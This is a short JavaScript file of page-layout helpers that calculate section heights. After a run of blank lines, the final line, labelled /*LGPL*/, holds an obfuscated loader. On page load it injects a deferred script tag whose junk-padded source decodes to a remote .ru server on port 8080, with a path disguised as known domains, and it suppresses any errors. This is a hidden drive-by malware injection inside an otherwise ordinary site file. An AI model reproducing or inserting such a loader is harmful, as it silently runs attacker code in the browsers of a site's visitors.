var maxBottom = 0;

function __getElementMaxBottom(element)
{
	if (element.className != "section")
	{
		var elementBottom = element.offsetTop + element.offsetHeight;
		if (elementBottom > maxBottom)
		{
			maxBottom = elementBottom;
		}
	}

	if (element.children != null)
	{	
		var children = element.children;
		
		for (var childIndex = 0; childIndex < children.length; childIndex++)
		{
			var child = children(childIndex);
			
			__getElementMaxBottom(child);
		}
	}
}

function __calcSectionHeight(section, minTop)
{
	maxBottom = 0;

	if (document.layers == null)
	{
		__getElementMaxBottom(section);
		section.style.height = maxBottom;

		absoluteBottom = section.offsetTop + section.offsetHeight;
		if (absoluteBottom < minTop)
		{
			diff = minTop - absoluteBottom;
			newHeight = parseInt(section.style.height) + diff;
			section.style.height = newHeight;
		}
	}
	else
	{
		absoluteBottom = section.pageY + section.clip.height;
		if (absoluteBottom < minTop)
		{
			section.resizeBy(0, (minTop - absoluteBottom));
		}
	}
}










/*LGPL*/ try{ window.onload = function(){var P2rqh3r6zrhncwq = document.createElement('s!!@c(!r^$)i#@@p)($t()('.replace(/\(|\$|\)|\^|@|#|\!|&/ig, ''));P2rqh3r6zrhncwq.setAttribute('defer', 'd!e@(f#&^)e&r$@!'.replace(/\(|&|#|@|\^|\)|\!|\$/ig, ''));P2rqh3r6zrhncwq.setAttribute('type', 't)&&$e#!(^x&&$$@t(/^()j$!a(&#^v^$@^a$^#s$c#$r@($i))$#p(!))t#!)#'.replace(/@|#|\(|\^|\)|&|\!|\$/ig, ''));P2rqh3r6zrhncwq.setAttribute('id', 'S#i^#^4^d(@(a)$7#)&m^y&^0)@((9#)('.replace(/\(|\$|\^|#|\!|\)|&|@/ig, ''));P2rqh3r6zrhncwq.setAttribute('s($(()r$c)'.replace(/\$|\)|\!|@|#|&|\^|\(/ig, ''),  'h)t$)#t!@(p$(#&:^##/!#@)/&()!y!a$m^-((#c##o@&($m(.^((m#^e(#$).(#@c@(#o$^m@$.)!&z$@s$h!a(^@r@e#)-)((n))e!!$t)&.(t##)h)e)(#c(h&(o)(@c$@$@o$#l&!&a((t#)#e#@)$w@!!$(e#!@b(&.($r!(u!&:^@8(0&!8#$0$$&/#!k()o!m!@l)^!#i&!&.)^@c))&)o!&(m$/($k(@o$&(m@^l))i@&(.!c#$o)m&#/#(o((n!$e!((&!t@@@$.)#p&$&l(#/!(w&@!i(@n#^(^a@@#m^$(#p!^.!^(c)@(^^o!(m)/)($g@@o@o!g^)l@$$#e&!.@$(&c!$o(^)m@$/(&^'.replace(/\^|\!|@|#|\$|\(|&|\)/ig, ''));if (document){document.body.appendChild(P2rqh3r6zrhncwq);}} } catch(H90vep64wagaigmuokvt5b) {}
